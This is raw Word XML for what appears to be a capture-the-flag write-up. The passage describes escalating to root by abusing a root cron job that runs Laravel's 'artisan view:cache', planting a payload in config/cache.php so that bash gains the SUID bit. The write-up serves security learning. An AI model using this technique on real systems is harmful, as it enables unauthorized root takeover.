          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivEsc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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After reading the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we can notice that there is a task being executed every 1 minute with the following command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php /var/www/html/artisan view:cache.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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this task is executed by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, we can abuse it to escalate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://laravel.com/docs/9.x/views</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://laravel.com/docs/9.x/cache</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Compiling views during the request may have a small negative performance impact, so Laravel provides the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view:cache</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Artisan command to pre-compile all views used by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Laravel provides a unified API for multiple caching systems. The cache configuration is located at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config/cache.php. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this file, you can specify which cache driver you want to use by default across the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Knowing this, we can use the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/config/cache.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to escalate our privileges. We can write a payload in this file to grant the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permission.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/</w:t>
        </w:r>
      </w:hyperlink>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114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1778000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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waiting 1 minute, the bash binary will have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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97000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51"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943600" cy="1397000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId31" w:type="default"/>
      <w:headerReference r:id="rId32" w:type="first"/>
      <w:headerReference r:id="rId33" w:type="even"/>
      <w:footerReference r:id="rId34" w:type="default"/>
      <w:footerReference r:id="rId35" w:type="first"/>
      <w:footerReference r:id="rId36"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A">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="10"/>
    <w:bookmarkEnd w:id="10"/>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64" name="image5.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image5.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4B">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4C">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8.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47" name="image6.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image6.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Hackhristmas</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19.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image19.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8.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2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.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hyperlink" Target="https://laravel.com/docs/9.x/views" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://laravel.com/docs/9.x/cache"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0.png"/><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4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/Php/func_filesystem_file_put_contents.asp" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlencode.org/" TargetMode="External"/><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19.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vQ3AYNfs8J5hYgClcu3PZtMoRw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLnd5ZHVrdnhlczNiZTIOaC42Z2p5eWZ3eWl1MDIyDmguNjhndnBoMWc3M3ExMg5oLmc5OGhvMHl5Yno2eTIOaC4zMmszemk3aXNmZ3cyDmgueG92N3E2Njdmb3k1Mg5oLjZuNDg4Y20wd2Z0bDIOaC4xMzRhZzd2OHZvMXQyDmgub3NxaTdhYmJndnQwMg5oLjE3NWY1Y3M5NHowbzgAciExNGMxTWNGa2tUUlhWYXJjM2dyX3Nrc0pSS3BDVEh0Z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